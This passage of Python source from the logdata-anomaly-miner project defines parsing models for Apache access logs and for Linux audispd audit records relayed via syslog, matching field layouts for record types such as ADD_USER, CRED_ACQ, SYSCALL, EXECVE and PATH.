FixedDataModelElement("sp6", b'" '), status_code_model, FixedDataModelElement("sp7", whitespace_str), size_model, OptionalMatchModelElement( "combined", SequenceModelElement("combined", [ FixedDataModelElement("sp9", b' "'), DelimitedDataModelElement("referer", b'"', b"\\"), FixedDataModelElement("sp10", b'" "'), DelimitedDataModelElement("user_agent", b'"', b"\\"), FixedDataModelElement("sp11", b'"') ])) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/AudispdParsingModel.py000066400000000000000000001400211500476301700327430ustar00rootroot00000000000000"""This module contains functions and classes to create the parsing model.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.HexStringModelElement import HexStringModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.MatchElement import MatchElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.WhiteSpaceLimitedDataModelElement import WhiteSpaceLimitedDataModelElement from aminer.parsing.ModelElementInterface import ModelElementInterface def get_model(): """Return a model to parse a audispd message logged via syslog after any standard logging preamble, e.g. from syslog.""" class ExecArgumentDataModelElement(ModelElementInterface): """This is a helper class for parsing the (encoded) exec argument strings found within audit logs.""" def get_match_element(self, target_path: str, match_context): """Find the maximum number of bytes belonging to an exec argument. @return a match when at least two bytes were found including the delimiters. """ data = match_context.match_data match_len = 0 if data[0] == ord(b'"'): match_len = data.find(b'"', 1) if match_len == -1: return None match_value = data[1:match_len] match_len += 1 elif data.startswith(b"(null)"): match_len = 6 match_value = None else: # Must be upper case hex encoded: match_value = b"" next_value = -1 for d_byte in data: if 0x30 <= d_byte <= 0x39: d_byte -= 0x30 elif 0x41 <= d_byte <= 0x46: d_byte -= 0x37 else: break if next_value == -1: next_value = (d_byte << 4) else: match_value += bytearray(((next_value | d_byte),)) next_value = -1 match_len += 1 if next_value != -1: return None match_data = data[:match_len] match_context.update(match_data) return MatchElement(f"{target_path}/{self.element_id}", match_data, match_value, None) pam_status_word_list = FixedWordlistDataModelElement("status", [b"failed", b"success"]) pid = b" pid=" uid = b" uid=" auid = b" auid=" gid = b" gid=" ses = b" ses=" exe = b' exe="' hostname = b'" hostname=' hostname1 = b'" (hostname=' addr = b" addr=" addr1 = b", addr=" terminal = b" terminal=" terminal1 = b", terminal=" res = b" res=" exe1 = b'" exe="' subj = b" subj=" comm = b" comm=" reason = b" reason=" dev = b" dev=" sig = b" sig=" alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._-" perms_alphabet = b"abcdefghijklmnopqrstuvwxyz," type_branches = { "ADD_GROUP": SequenceModelElement("addgroup", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", subj), DelimitedDataModelElement("subj", b" "), FixedDataModelElement("s5", b" msg='op=adding group acct=\""), DelimitedDataModelElement("acct", b'"'), FixedDataModelElement("s6", b'"'), FixedDataModelElement("s7", exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s8", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s9", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s10", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s11", res), pam_status_word_list, FixedDataModelElement("s12", b"'"), ]), "ADD_USER": SequenceModelElement("adduser", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", subj), DelimitedDataModelElement("subj", b" "), FixedWordlistDataModelElement("s5", [b" msg='op=adding user id=", b" msg='op=adding home directory id="]), DecimalIntegerValueModelElement("newuserid"), FixedDataModelElement("s6", exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s7", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s8", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s9", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s10", res), pam_status_word_list, FixedDataModelElement("s11", b"'"), ]), "ANOM_ABEND": SequenceModelElement("anom_abend", [ FixedDataModelElement("s0", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", gid), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", subj), DelimitedDataModelElement("subj", b" "), FixedDataModelElement("s5", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s6", comm), ExecArgumentDataModelElement("command"), FixedDataModelElement("s7", reason), ExecArgumentDataModelElement("reason"), FixedDataModelElement("s8", sig), DecimalIntegerValueModelElement("sig") ]), "ANOM_ACCESS_FS": AnyByteDataModelElement("anom_access_fs"), "ANOM_ADD_ACCT": AnyByteDataModelElement("anom_add_acct"), "ANOM_AMTU_FAIL": AnyByteDataModelElement("anom_amtu_fail"), "ANOM_CRYPTO_FAIL": AnyByteDataModelElement("anom_crypto_fail"), "ANOM_DEL_ACCT": AnyByteDataModelElement("anom_del_acct"), "ANOM_EXEC": SequenceModelElement("anom_exec", [ FixedDataModelElement("space", b" "), VariableByteDataModelElement("user", alphabet), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b" msg='op="), DelimitedDataModelElement("msg", b" "), FixedDataModelElement("s5", b' acct="'), DelimitedDataModelElement("acct", b'"'), FixedDataModelElement("s6", exe1), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s7", hostname1), DelimitedDataModelElement("hostname", b","), FixedDataModelElement("s8", addr1), DelimitedDataModelElement("addr", b","), FixedDataModelElement("s9", terminal1), DelimitedDataModelElement("terminal", b" "), FixedDataModelElement("s10", res), pam_status_word_list, FixedDataModelElement("s11", b")'") ]), "ANOM_LOGIN_ACCT": AnyByteDataModelElement("anom_login_acct"), "ANOM_LOGIN_FAILURES": AnyByteDataModelElement("anom_login_failures"), "ANOM_LOGIN_LOCATION": AnyByteDataModelElement("anom_login_location"), "ANOM_LOGIN_SESSIONS": AnyByteDataModelElement("anom_login_sessions"), "ANOM_LOGIN_TIME": AnyByteDataModelElement("anom_login_time"), "ANOM_MAX_DAC": AnyByteDataModelElement("anom_max_dac"), "ANOM_MAX_MAC": AnyByteDataModelElement("anom_max_mac"), "ANOM_MK_EXEC": AnyByteDataModelElement("anom_mk_exec"), "ANOM_MOD_ACCT": AnyByteDataModelElement("anom_mod_acct"), "ANOM_PROMISCUOUS": SequenceModelElement("anom_promiscuous", [ FixedDataModelElement("s0", b" dev="), VariableByteDataModelElement("dev", alphabet), FixedDataModelElement("s1", b" prom="), DecimalIntegerValueModelElement("prom"), FixedDataModelElement("s2", b" old_prom="), DecimalIntegerValueModelElement("old_prom"), FixedDataModelElement("s3", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s4", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s5", gid), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("s6", ses), DecimalIntegerValueModelElement("ses"), ]), "ANOM_RBAC_FAIL": AnyByteDataModelElement("anom_rbac_fail"), "ANOM_RBAC_INTEGRITY_FAIL": AnyByteDataModelElement("anom_rbac_integrity_fail"), "ANOM_ROOT_TRANS": AnyByteDataModelElement("anom_root_trans"), "AVC": AnyByteDataModelElement("avc"), "AVC_PATH": AnyByteDataModelElement("avc_path"), "BPRM_FCAPS": SequenceModelElement("bprmfcaps", [ FixedDataModelElement("s0", b" fver="), DecimalIntegerValueModelElement("fver"), FixedDataModelElement("s1", b" fp="), HexStringModelElement("fp"), FixedDataModelElement("s2", b" fi="), HexStringModelElement("fi"), FixedDataModelElement("s3", b" fe="), HexStringModelElement("fe"), FixedDataModelElement("s4", b" old_pp="), DelimitedDataModelElement("pp-old", b" "), FixedDataModelElement("s5", b" old_pi="), DelimitedDataModelElement("pi-old", b' '), FixedDataModelElement("s6", b" old_pe="), DelimitedDataModelElement("pe-old", b" "), FixedDataModelElement("s7", b" new_pp="), DelimitedDataModelElement("pp-new", b" "), FixedDataModelElement("s8", b" new_pi="), DelimitedDataModelElement("pi-new", b" "), FixedDataModelElement("s9", b" new_pe="), AnyByteDataModelElement("pe-new") ]), "CAPSET": AnyByteDataModelElement("capset"), "CHGRP_ID": AnyByteDataModelElement("chgrp_id"), "CHUSER_ID": AnyByteDataModelElement("chuser_id"), "CONFIG_CHANGE": SequenceModelElement("conf-change", [ FixedDataModelElement("s0", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s1", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s2", b' op="'), DelimitedDataModelElement("op", b'"'), FixedDataModelElement("s3", b'" path="'), DelimitedDataModelElement("path", b'"'), FixedDataModelElement("s4", b'" key='), DelimitedDataModelElement("key", b" "), FixedDataModelElement("s5", b' list='), DecimalIntegerValueModelElement("list"), FixedDataModelElement("s6", res), DecimalIntegerValueModelElement("result") ]), "CRED_ACQ": SequenceModelElement("credacq", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b' msg=\'op=PAM:setcred acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s5", exe1), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), pam_status_word_list, FixedDataModelElement("s10", b"'"), ]), "CRED_DISP": SequenceModelElement("creddisp", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b' msg=\'op=PAM:setcred acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s5", exe1), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), pam_status_word_list, FixedDataModelElement("s10", b"'"), ]), "CRED_REFR": SequenceModelElement("creddisp", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b' msg=\'op=PAM:setcred acct="root" exe="/usr/sbin/sshd" hostname='), IpAddressDataModelElement("clientname"), FixedDataModelElement("s5", addr), IpAddressDataModelElement("clientip"), FixedDataModelElement("s6", terminal), DelimitedDataModelElement("terminal", b" "), FixedDataModelElement("s7", res), pam_status_word_list, FixedDataModelElement("s8", b"'"), ]), "CRYPTO_FAILURE_USER": AnyByteDataModelElement("crypto_failure_user"), "CRYPTO_KEY_USER": AnyByteDataModelElement("crypto_key_user"), "CRYPTO_LOGIN": AnyByteDataModelElement("crypto_login"), "CRYPTO_LOGOUT": AnyByteDataModelElement("crypto_logout"), "CRYPTO_PARAM_CHANGE_USER": AnyByteDataModelElement("crypto_param_change_user"), "CRYPTO_REPLAY_USER": AnyByteDataModelElement("crypto_replay_user"), "CRYPTO_SESSION": SequenceModelElement("crypto_session", [ FixedDataModelElement("space", b" "), VariableByteDataModelElement("user", alphabet), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s4", b" msg='op="), DelimitedDataModelElement("msg", b" "), FixedDataModelElement("s5", b' direction='), DelimitedDataModelElement("direction", b' '), FixedDataModelElement("s6", b' cipher='), DelimitedDataModelElement("cipher", b' '), FixedDataModelElement("s7", b' ksize='), DecimalIntegerValueModelElement("ksize"), FixedDataModelElement("s8", b' rport='), DecimalIntegerValueModelElement("rport"), FixedDataModelElement("s9", b' laddr='), IpAddressDataModelElement("laddr"), FixedDataModelElement("s10", b' lport='), DecimalIntegerValueModelElement("lport"), FixedDataModelElement("s11", b' id='), DecimalIntegerValueModelElement("id"), FixedDataModelElement("s12", exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s13", hostname1), DelimitedDataModelElement("hostname", b","), FixedDataModelElement("s14", addr1), DelimitedDataModelElement("addr", b","), FixedDataModelElement("s15", terminal1), DelimitedDataModelElement("terminal", b" "), FixedDataModelElement("s16", res), pam_status_word_list, FixedDataModelElement("s17", b")'") ]), "CRYPTO_TEST_USER": AnyByteDataModelElement("crypto_test_user"), "CWD": SequenceModelElement("cwd", [ FixedDataModelElement("s0", b" cwd="), ExecArgumentDataModelElement("cwd")]), "DAC_CHECK": AnyByteDataModelElement("dac_check"), "DAEMON_ABORT": SequenceModelElement("daemon_abort", [ FixedDataModelElement("s0", b" auditd error halt,"), FixedDataModelElement("s1", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s2", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s3", res), pam_status_word_list ]), "DAEMON_ACCEPT": AnyByteDataModelElement("daemon_accept"), "DAEMON_CLOSE": AnyByteDataModelElement("daemon_close"), "DAEMON_CONFIG": SequenceModelElement("daemon_config", [ FixedDataModelElement("s0", b" auditd error getting hup info - no change, sending"), FixedDataModelElement("s1", auid), DelimitedDataModelElement("auid", b" "), FixedDataModelElement("s2", pid), DelimitedDataModelElement("pid", b" "), FixedDataModelElement("s3", subj), DelimitedDataModelElement("subj", b" "), FixedDataModelElement("s4", res), pam_status_word_list ]), "DAEMON_END": SequenceModelElement("daemon_end", [ FixedDataModelElement("s0", b" auditd normal halt, sending"), FixedDataModelElement("s1", auid), DelimitedDataModelElement("auid", b" "), FixedDataModelElement("s2", pid), DelimitedDataModelElement("pid", b" "), FixedDataModelElement("s3", subj), OptionalMatchModelElement("optional_subj", DelimitedDataModelElement("subj", b" ")), FixedDataModelElement("s4", res), pam_status_word_list ]), "DAEMON_RESUME": SequenceModelElement("daemon_resume", [ FixedDataModelElement("s0", b" auditd resuming logging, sending"), FixedDataModelElement("s1", auid), DelimitedDataModelElement("auid", b" "), FixedDataModelElement("s2", pid), DelimitedDataModelElement("pid", b" "), FixedDataModelElement("s3", subj), DelimitedDataModelElement("subj", b" "), FixedDataModelElement("s4", res), pam_status_word_list ]), "DAEMON_ROTATE": AnyByteDataModelElement("daemon_rotate"), "DAEMON_START": SequenceModelElement("daemon_start", [ FixedDataModelElement("s0", b" auditd start, ver="), DecimalFloatValueModelElement("ver"), FixedDataModelElement("s1", b" format="), DelimitedDataModelElement("format", b" "), FixedDataModelElement("s2", b" kernel="), DelimitedDataModelElement("kernel", b" "), FixedDataModelElement("s3", auid), DelimitedDataModelElement("auid", b" "), FixedDataModelElement("s4", pid), DelimitedDataModelElement("pid", b" "), FixedDataModelElement("s5", res), pam_status_word_list ]), "DEL_GROUP": AnyByteDataModelElement("del_group"), "DEL_USER": AnyByteDataModelElement("del_user"), "EOE": AnyByteDataModelElement("eoe"), "EXECVE": SequenceModelElement("execve", [ FixedDataModelElement("s0", b" argc="), DecimalIntegerValueModelElement("argc"), # We need a type branch here also, but there is no additional data in EOE records after Ubuntu Trusty any more. RepeatedElementDataModelElement("arg", SequenceModelElement("execarg", [ FixedDataModelElement("s0", b" a"), DecimalIntegerValueModelElement("argn"), FixedDataModelElement("s1", b"="), ExecArgumentDataModelElement("argval") ])) ]), "FD_PAIR": SequenceModelElement("fdpair", [ FixedDataModelElement("s0", b" fd0="), DecimalIntegerValueModelElement("fd0"), FixedDataModelElement("s1", b" fd1="), DecimalIntegerValueModelElement("fd1") ]), "FS_RELABEL": AnyByteDataModelElement("fs_relabel"), "GRP_AUTH": AnyByteDataModelElement("grp_auth"), "INTEGRITY_DATA": AnyByteDataModelElement("integrity_data"), "INTEGRITY_HASH": AnyByteDataModelElement("integrity_hash"), "INTEGRITY_METADATA": AnyByteDataModelElement("integrity_metadata"), "INTEGRITY_PCR": AnyByteDataModelElement("integrity_pcr"), "INTEGRITY_RULE": AnyByteDataModelElement("integrity_rule"), "INTEGRITY_STATUS": AnyByteDataModelElement("integrity_status"), "IPC": AnyByteDataModelElement("ipc"), "IPC_SET_PERM": AnyByteDataModelElement("ipc_set_perm"), "KERNEL": AnyByteDataModelElement("kernel"), "KERNEL_OTHER": AnyByteDataModelElement("kernel_other"), "LABEL_LEVEL_CHANGE": AnyByteDataModelElement("label_level_change"), "LABEL_OVERRIDE": AnyByteDataModelElement("label_override"), # This message differs on Ubuntu 32/64 bit variants. "LOGIN": SequenceModelElement("login", [ FixedDataModelElement("s0", b" login"), FixedDataModelElement("s1", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s2", uid), DecimalIntegerValueModelElement("uid"), FixedWordlistDataModelElement("s3", [b" old auid=", b" old-auid="]), DecimalIntegerValueModelElement("auid-old"), FixedWordlistDataModelElement("s4", [b" new auid=", auid]), DecimalIntegerValueModelElement("auid-new"), FixedWordlistDataModelElement("s5", [b" old ses=", b" old-ses="]), DecimalIntegerValueModelElement("ses-old"), FixedWordlistDataModelElement("s6", [b" new ses=", ses]), DecimalIntegerValueModelElement("ses-new"), OptionalMatchModelElement("optional_result", SequenceModelElement("result_seq", [ FixedDataModelElement("s7", res), DecimalIntegerValueModelElement("result") ])) ]), "MAC_CIPSOV4_ADD": AnyByteDataModelElement("mac_cipsov4_add"), "MAC_CIPSOV4_DEL": AnyByteDataModelElement("mac_cipsov4_del"), "MAC_CONFIG_CHANGE": AnyByteDataModelElement("mac_config_change"), "MAC_IPSEC_EVENT": AnyByteDataModelElement("mac_ipsec_event"), "MAC_MAP_ADD": AnyByteDataModelElement("mac_map_add"), "MAC_MAP_DEL": AnyByteDataModelElement("mac_map_del"), "MAC_POLICY_LOAD": AnyByteDataModelElement("mac_policy_load"), "MAC_STATUS": SequenceModelElement("mac_status", [ FixedDataModelElement("s0", b" enforcing="), DecimalIntegerValueModelElement("enforcing"), FixedDataModelElement("s1", b" old_enforcing="), DecimalIntegerValueModelElement("old_enforcing"), FixedDataModelElement("s2", auid), DelimitedDataModelElement("auid", b" "), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses") ]), "MAC_UNLBL_ALLOW": AnyByteDataModelElement("mac_unlbl_allow"), "MAC_UNLBL_STCADD": AnyByteDataModelElement("mac_unlbl_stcadd"), "MAC_UNLBL_STCDEL": AnyByteDataModelElement("mac_unlbl_stcdel"), "MMAP": AnyByteDataModelElement("mmap"), "MQ_GETSETATTR": AnyByteDataModelElement("mq_getsetattr"), "MQ_NOTIFY": AnyByteDataModelElement("mq_notify"), "MQ_OPEN": AnyByteDataModelElement("mq_open"), "MQ_SENDRECV": AnyByteDataModelElement("mq_sendrecv"), "NETFILTER_CFG": SequenceModelElement("netfilter_cfg", [ FixedDataModelElement("s0", b" table="), FixedWordlistDataModelElement("table", [b"filter", b"mangle", b"nat"]), FixedDataModelElement("s1", b" family="), DecimalIntegerValueModelElement("family"), FixedDataModelElement("s2", b" entries="), DecimalIntegerValueModelElement("entries") ]), "NETFILTER_PKT": SequenceModelElement("netfilter_pkt", [ FixedDataModelElement("s0", b" mark=0x"), HexStringModelElement("mark"), FixedDataModelElement("s1", b" saddr="), FirstMatchModelElement("saddr", [ IpAddressDataModelElement("ipv4"), IpAddressDataModelElement("ipv6", ipv6=True), ]), FixedDataModelElement("s2", b" daddr="), FirstMatchModelElement("daddr", [ IpAddressDataModelElement("ipv4"), IpAddressDataModelElement("ipv6", ipv6=True), ]), FixedDataModelElement("s3", b" proto="), DecimalIntegerValueModelElement("proto") ]), "OBJ_PID": SequenceModelElement("objpid", [ FixedDataModelElement("s0", b" opid="), DecimalIntegerValueModelElement("opid"), FixedDataModelElement("s1", b" oauid="), DecimalIntegerValueModelElement("oauid", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("s2", b" ouid="), DecimalIntegerValueModelElement("ouid"), FixedDataModelElement("s3", b" oses="), DecimalIntegerValueModelElement("oses", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("s4", b" obj="), DelimitedDataModelElement("obj", b" "), FixedDataModelElement("s4", b" ocomm="), ExecArgumentDataModelElement("ocomm") ]), "PATH": SequenceModelElement("path", [ FixedDataModelElement("s0", b" item="), DecimalIntegerValueModelElement("item"), FixedDataModelElement("s1", b" name="), ExecArgumentDataModelElement("name"), FirstMatchModelElement("fsinfo", [ SequenceModelElement("inodeinfo", [ FixedDataModelElement("s0", b" inode="), DecimalIntegerValueModelElement("inode"), FixedDataModelElement("s1", dev), # A special major/minor device element could be better here. VariableByteDataModelElement("dev", b"0123456789abcdef:"), FixedDataModelElement("s2", b" mode="), # is octal DecimalIntegerValueModelElement("mode", value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement("s3", b" ouid="), DecimalIntegerValueModelElement("ouid"), FixedDataModelElement("s4", b" ogid="), DecimalIntegerValueModelElement("ogid"), FixedDataModelElement("s5", b" rdev="), # A special major/minor device element could be better here (see above). VariableByteDataModelElement("rdev", b"0123456789abcdef:"), FixedDataModelElement("s6", b" nametype=") ]), FixedDataModelElement("noinfo", b" nametype=")]), FixedWordlistDataModelElement("nametype", [b"CREATE", b"DELETE", b"NORMAL", b"PARENT", b"UNKNOWN"]) ]), "PROCTITLE": SequenceModelElement("proctitle", [ FixedDataModelElement("s0", b" proctitle="), ExecArgumentDataModelElement("proctitle")]), "RESP_ACCT_LOCK": AnyByteDataModelElement("resp_acct_lock"), "RESP_ACCT_LOCK_TIMED": AnyByteDataModelElement("resp_acct_lock_timed"), "RESP_ACCT_REMOTE": AnyByteDataModelElement("resp_acct_remote"), "RESP_ACCT_UNLOCK_TIMED": AnyByteDataModelElement("resp_acct_unlock_timed"), "RESP_ALERT": AnyByteDataModelElement("resp_alert"), "RESP_ANOMALY": AnyByteDataModelElement("resp_anomaly"), "RESP_EXEC": AnyByteDataModelElement("resp_exec"), "RESP_HALT": AnyByteDataModelElement("resp_halt"), "RESP_KILL_PROC": AnyByteDataModelElement("resp_kill_proc"), "RESP_SEBOOL": AnyByteDataModelElement("resp_sebool"), "RESP_SINGLE": AnyByteDataModelElement("resp_single"), "RESP_TERM_ACCESS": AnyByteDataModelElement("resp_term_access"), "RESP_TERM_LOCK": AnyByteDataModelElement("resp_term_lock"), "ROLE_ASSIGN": AnyByteDataModelElement("role_assign"), "ROLE_MODIFY": AnyByteDataModelElement("role_modify"), "ROLE_REMOVE": AnyByteDataModelElement("role_remove"), "SELINUX_ERR": SequenceModelElement("service_err", [ FixedDataModelElement("s0", b" op="), DelimitedDataModelElement("op", b" "), FixedDataModelElement("s1", reason), DelimitedDataModelElement("reason", b" "), FixedDataModelElement("s2", b" scontext="), DelimitedDataModelElement("scontext", b" "), FixedDataModelElement("s3", b" tcontext="), DelimitedDataModelElement("tcontext", b" "), FixedDataModelElement("s4", b" tclass="), DelimitedDataModelElement("tclass", b" "), FixedDataModelElement("s5", b" perms="), VariableByteDataModelElement("perms", perms_alphabet) ]), "SERVICE_START": SequenceModelElement("service", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b" msg='"), OptionalMatchModelElement("optional_msg", DelimitedDataModelElement("msg", b" ")), FixedDataModelElement("s5", b' comm="'), DelimitedDataModelElement("comm", b'"'), FixedDataModelElement("s5", b'" exe="'), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), pam_status_word_list, FixedDataModelElement("s10", b"'") ]), "SOCKADDR": SequenceModelElement("sockaddr", [ FixedDataModelElement("s0", b" saddr="), HexStringModelElement("sockaddr", upper_case=True) ]), "SOCKETCALL": SequenceModelElement("socketcall", [ FixedDataModelElement("s0", b" nargs="), DecimalIntegerValueModelElement("nargs"), RepeatedElementDataModelElement("args", SequenceModelElement("arg", [ FixedDataModelElement("s1", b" a"), DecimalIntegerValueModelElement("arg_num"), FixedDataModelElement("s2", b"="), DecimalIntegerValueModelElement("arg"), ])) ]), "SYSCALL": SequenceModelElement("syscall", [ FixedDataModelElement("s0", b" arch="), HexStringModelElement("arch"), FixedDataModelElement("s1", b" syscall="), DecimalIntegerValueModelElement("syscall"), OptionalMatchModelElement( "personality", SequenceModelElement("pseq", [ FixedDataModelElement("s0", b" per="), DecimalIntegerValueModelElement("personality") ])), OptionalMatchModelElement("result", SequenceModelElement("rseq", [ FixedDataModelElement("s2", b" success="), FixedWordlistDataModelElement("succes", [b"no", b"yes"]), FixedDataModelElement("s3", b" exit="), DecimalIntegerValueModelElement("exit", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL) ])), FixedDataModelElement("s4", b" a0="), HexStringModelElement("arg0"), FixedDataModelElement("s5", b" a1="), HexStringModelElement("arg1"), FixedDataModelElement("s6", b" a2="), HexStringModelElement("arg2"), FixedDataModelElement("s7", b" a3="), HexStringModelElement("arg3"), FixedDataModelElement("s8", b" items="), DecimalIntegerValueModelElement("items"), FixedDataModelElement("s9", b" ppid="), DecimalIntegerValueModelElement("ppid"), FixedDataModelElement("s10", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s11", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s12", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s13", gid), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("s14", b" euid="), DecimalIntegerValueModelElement("euid"), FixedDataModelElement("s15", b" suid="), DecimalIntegerValueModelElement("suid"), FixedDataModelElement("s16", b" fsuid="), DecimalIntegerValueModelElement("fsuid"), FixedDataModelElement("s17", b" egid="), DecimalIntegerValueModelElement("egid"), FixedDataModelElement("s18", b" sgid="), DecimalIntegerValueModelElement("sgid"), FixedDataModelElement("s19", b" fsgid="), DecimalIntegerValueModelElement("fsgid"), FixedDataModelElement("s20", b" tty="), DelimitedDataModelElement("tty", b" "), FixedDataModelElement("s21", ses), DecimalIntegerValueModelElement("sesid"), FixedDataModelElement("s22", comm), ExecArgumentDataModelElement("command"), FixedDataModelElement("s23", exe), DelimitedDataModelElement("executable", b'"'), FixedDataModelElement("s24", b'" key='), AnyByteDataModelElement("key") ]), "SYSTEM_BOOT": AnyByteDataModelElement("system_boot"), "SYSTEM_RUNLEVEL": AnyByteDataModelElement("system_runlevel"), "SYSTEM_SHUTDOWN": AnyByteDataModelElement("system_shutdown"), "TRUSTED_APP": AnyByteDataModelElement("trusted_app"), "TTY": AnyByteDataModelElement("tty"), # The UNKNOWN type is used then audispd does not know the type of the event, usually because the kernel is more recent than audispd, # thus emiting yet unknown event types. # * type=1327: procitle: see https://www.redhat.com/archives/linux-audit/2014-February/msg00047.html "UNKNOWN[1327]": SequenceModelElement("unknown-proctitle", [ FixedDataModelElement("s0", b" proctitle="), ExecArgumentDataModelElement("proctitle") ]), "USER_ACCT": SequenceModelElement("useracct", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b' msg=\'op=PAM:accounting acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s5", exe1), 